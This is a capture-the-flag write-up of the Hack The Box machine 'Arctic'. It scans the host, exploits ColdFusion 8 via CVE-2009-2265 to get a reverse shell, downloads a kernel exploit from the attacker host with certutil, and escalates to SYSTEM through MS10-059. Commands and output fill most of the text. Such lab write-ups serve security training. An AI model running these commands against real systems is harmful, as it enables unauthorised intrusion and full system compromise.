Arctic

Very simple box. Almost pure automated tools. Great for beginners.

sudo nmap -sS -sV -p- -T4 -Pn -n –disable-arp-ping -v 10.10.10.11

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Connect to port 8500 via netcat resulted in instant disconnect. Trying HTTP finds a webservice and it is frustratingly SLOW. I can see why this box is called Artic.

curl http://10.10.10.11:8500/
<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i> 03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a> <i>dir</i> 03/22/17 08:55 μμ
</pre><hr></html>

http://10.10.10.11:8500/CFIDE/administrator/

Exploit search returns a RCE vulnerability

CVE-2009-2265

https://www.exploit-db.com/exploits/50057

python3 exploit.py

Printing some information for debugging...
lhost: 10.10.14.12
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: 1a64522d330c4653a6af856c85a99a3f.jsp

Deleting the payload...

Listening for connection...

Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.11] 49250

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

I did originally complete this box by popping a meterpreter session with web delivery and using the exploit suggester which used ms10_092_schelevator to get to system. Writing this writeup however it does not want to play ball with my web delivery so I will show an alternate path to system.

Using windows exploit suggester

Copying the getsystem info into a local file

Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 22/10/2021, 2:31:11 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Step
[02]: Intel64 Family 6 Model 79 Step
BIOS Version: Phoenix Technologies LTD 6.00, 12/12
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istan
Total Physical Memory: 1.023 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 960 MB
Virtual Memory: In Use: 1.087 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network C
Connection Name: Local Area Co
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11

./windows-exploit-suggester.py –update

./windows-exploit-suggester.py –database 2021-10-18-mssb.xls –systeminfo systeminfo

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

MS10-059 is a well known kernal exploit. It can be downloaded from here.

https://github.com/SecWiki/windows-kernel-exploits

Upload the the exe with cert util

C:\Users\tolis\Downloads>certutil -urlcache -f http://10.10.14.12:5000/MS10-059.exe MS10-059.exe
**** Online ****
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5

Directory of C:\Users\tolis\Downloads

22/10/2021 03:23 �� <DIR> .
22/10/2021 03:23 �� <DIR> ..
22/10/2021 03:24 �� 784.384 MS10-059.exe
1 File(s) 784.384 bytes
2 Dir(s) 33.180.368.896 bytes free

C:\Users\tolis\Downloads>.\MS10-059.exe 10.10.14.12 6666
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.11] 49410
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\tolis\Downloads>whoami
whoami
nt authority\system